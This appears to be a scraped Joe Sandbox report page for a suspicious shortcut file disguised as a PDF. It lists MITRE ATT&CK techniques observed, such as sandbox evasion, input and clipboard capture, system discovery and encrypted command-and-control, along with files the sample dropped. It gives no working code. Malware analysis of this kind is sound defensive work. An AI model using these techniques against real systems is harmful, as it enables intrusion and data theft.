Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report filepdf.pdf.lnk.download.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\d4d62ef1-6e46-4246-9139-8bce1639112f.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Windows Analysis Report
filepdf.pdf.lnk.download.lnk

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre